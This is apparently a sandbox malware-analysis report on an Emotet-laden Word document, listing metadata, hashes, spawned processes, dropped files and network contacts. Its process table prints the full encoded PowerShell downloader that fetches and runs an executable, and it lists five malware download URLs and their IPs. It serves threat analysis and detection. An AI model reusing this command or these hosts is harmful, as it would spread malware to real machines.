File name: | File 38128 916659818.doc |
Full analysis: | https://app.any.run/tasks/2d37f047-f2bf-4183-9d7c-154688766a2e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 24, 2019, 20:02:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Intelligent, Subject: South Dakota, Author: Carol Carroll, Comments: COM Sao Tome and Principe, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 20:43:00 2019, Last Saved Time/Date: Fri May 24 20:43:00 2019, Number of Pages: 1, Number of Words: 16, Number of Characters: 94, Security: 0 |
MD5: | CADA57979FA3C839C18ED2E219C9A745 |
SHA1: | 6986C7C1CF4A65FD98AA016CD1487920A7B4342A |
SHA256: | 75ABC222B82B46458EA2BBC132CFD46D43473559B20195E2CDD0EE3D044A04A6 |
SSDEEP: | 3072:477HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qLBHaRxO8hT5:477HUUUUUUUUUUUUUUUUUUUT52VgBHaZ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserTypeLen: | 32 |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | Intelligent |
Subject: | South Dakota |
Author: | Carol Carroll |
Keywords: | - |
Comments: | COM Sao Tome and Principe |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:24 19:43:00 |
ModifyDate: | 2019:05:24 19:43:00 |
Pages: | 1 |
Words: | 16 |
Characters: | 94 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Runolfsdottir Inc |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 109 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | McCullough |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1684 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\File 38128 916659818.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1484 | powershell -nop -e JAB0ADYAdwA0AHUAbwA9ACcAdwA2ADAATQB0AG8AbABFACcAOwAkAEYAegBiAFIAUABhAE4AegAgAD0AIAAnADUAOAA1ACcAOwAkAG4AQwBKAF8AXwAwAD0AJwBaADgAdwBzADQAbwBMAEIAJwA7ACQARwBoAHAAQwA2AFoAbwBKAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABGAHoAYgBSAFAAYQBOAHoAKwAnAC4AZQB4AGUAJwA7ACQAbwBTAFEAXwA3AE4AZgAwAD0AJwBwAHIATAAyAF8AbQAnADsAJABHADEAbwBCAEgAaQB0AGwAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAJwArACcAYwB0ACcAKQAgAG4AZQB0AC4AYAB3AEUAYgBDAGAATABJAGUAYABOAFQAOwAkAEQASwByAFQAWgA3AD0AJwBoAHQAdABwADoALwAvAGEAZABhAGMAYQBuAC4AbgBlAHQALwBjAGcAaQAtAGIAaQBuAC8AQQByAFEAbABZAFcAVABHAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AYwB6AGEAYgBrAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBFAGQAUQBkAG8ARwBuAGIAQgB6AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AcgBpAC0AbQBhAGcAYQB6AGkAbgBlAC4AYwBvAG0ALwByAGkALwB1AHMAbwBkADcAaQBuAGwAYwAzAF8AYQA4AGIAbwBsAHQALQAzADUALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAGgAYQBuAGcALQBkAGkAbgBnAC4AYwBvAG0ALgB0AHcALwBwAGgAcABtAHkAYQBkAG0AaQBuAC8AegBlADIANAB5AHYAdgBvAG0AXwB0AGsAZABwAG0AbAAzADQAdwAtADUANgAwADQAOQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHQAYQBmAGEALgBwAHgAbABjAG8AcgBwAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB4AEUAVgBLAGUAeQBHAFMALwAnAC4AcwBwAGwASQBUACgAJwBAACcAKQA7ACQAbAA3AHcANQA4ADQAPQAnAEkATQBGAGoAaABtAFgAVAAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB2AE0ATQA3AHAAegAgAGkAbgAgACQARABLAHIAVABaADcAKQB7AHQAcgB5AHsAJABHADEAbwBCAEgAaQB0AGwALgBEAE8AVwBOAEwAbwBBAEQAZgBJAGwARQAoACQASwB2AE0ATQA3AHAAegAsACAAJABHAGgAcABDADYAWgBvAEoAKQA7ACQAdgB3AEgAOABpAEIARQB1AD0AJwBuADcAdABRAE4AQQBTAFIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABHAGgAcABDADYAWgBvAEoAKQAuAEwARQBOAGcAdABoACAALQBnAGUAIAAzADkANwA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAVABhAHIAVAAoACQARwBoAHAAQwA2AFoAbwBKACkAOwAkAFQARABJAEQAVAA0AFcAPQAnAFAANABDAEUAcwBwACcAOwBiAHIAZQBhAGsAOwAkAFgAdgAxAE0ANQBJAEIATgA9ACcAUgBoAFQARgBUADYAagBoACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHQASwBJAHMATQB6AGYANAA9ACcAYwBqADgAagAxAE8ARAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1684 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREE16.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KZJ08R3B5H0R6EDDQDPY.temp | — | |
MD5:— | SHA256:— | |||
1684 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D881A2A.wmf | wmf | |
MD5:3E356A7AF25F0EBA0ABCD97B45CD0E0E | SHA256:C649828E6C2949B283BE405DBBB72D5D45903E62EF274848FD288A4ACBB38F69 | |||
1684 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\449A398D.wmf | wmf | |
MD5:E1289578501661DCB11981206602BC5F | SHA256:8D01395AEDB4EE8380F43E5FEBB9BC0C028B4668A838CC6676D2340ADA8520EC | |||
1684 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8701023.wmf | wmf | |
MD5:3C8E7191BC319CDB0C3922DDA4E1469F | SHA256:6ACC236788D993BA782EAF2F2D5B4C800E0CB8B7FD69EB0C123B0B3AEE7750D9 | |||
1684 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\File 38128 916659818.doc.LNK | lnk | |
MD5:632D6317C61646E9911056A8263C9849 | SHA256:6076D8671585A8EE1A792D77A304E2CB31045128BC33EAB2563E1A78E50636D3 | |||
1684 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:17222E7BED955763CB75EBDA153E0074 | SHA256:EAEB163582F92B56C14963150DA7DBEA34565552F3D187A793BE19BEB0978882 | |||
1684 | WINWORD.EXE | C:\Users\admin\Downloads\~$le 38128 916659818.doc | pgc | |
MD5:4CEB43E2D3E008E847AC709B368C9681 | SHA256:DE6AD5D48B60C13C529884649B367392B25129612A198D8438B0551980959A90 | |||
1684 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:793690AF4D980E6ADE41A519AB39B661 | SHA256:C798B4B4E480B67CD4B783919AB2FE4B7C625C47564544FF5B07C751709D0AA1 | |||
1684 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10F668BC.wmf | wmf | |
MD5:79B5E2D696BF83EE1F1F7ADA3AD0F269 | SHA256:6578089CC597DD0DA0074AF5C54CF0649D7447A6F7A6EF9141E3EFFB1CCFF137 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1484 | powershell.exe | GET | 404 | 13.124.222.135:80 | http://www.shang-ding.com.tw/phpmyadmin/ze24yvvom_tkdpml34w-56049/ | KR | xml | 345 b | unknown |
1484 | powershell.exe | GET | 404 | 104.31.87.57:80 | http://www.czabk.com/wp-admin/EdQdoGnbBz/ | US | xml | 345 b | suspicious |
1484 | powershell.exe | GET | 404 | 143.95.233.86:80 | http://www.ri-magazine.com/ri/usod7inlc3_a8bolt-35/ | US | xml | 345 b | suspicious |
1484 | powershell.exe | GET | 404 | 31.186.8.88:80 | http://adacan.net/cgi-bin/ArQlYWTG/ | TR | xml | 345 b | suspicious |
1484 | powershell.exe | GET | 404 | 175.176.161.147:80 | http://www.tafa.pxlcorp.com/wp-includes/xEVKeyGS/ | ID | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1484 | powershell.exe | 143.95.233.86:80 | www.ri-magazine.com | Colo4, LLC | US | suspicious |
1484 | powershell.exe | 31.186.8.88:80 | adacan.net | SAGLAYICI Teknoloji Bilisim Yayincilik Hiz. Ticaret Ltd. Sti. | TR | suspicious |
1484 | powershell.exe | 13.124.222.135:80 | www.shang-ding.com.tw | Amazon.com, Inc. | KR | unknown |
1484 | powershell.exe | 104.31.87.57:80 | www.czabk.com | Cloudflare Inc | US | shared |
— | — | 175.176.161.147:80 | www.tafa.pxlcorp.com | Varnion Technology Semesta, PT | ID | suspicious |
Domain | IP | Reputation |
---|---|---|
adacan.net |
| suspicious |
www.czabk.com |
| suspicious |
www.ri-magazine.com |
| suspicious |
www.shang-ding.com.tw |
| unknown |
www.tafa.pxlcorp.com |
| malicious |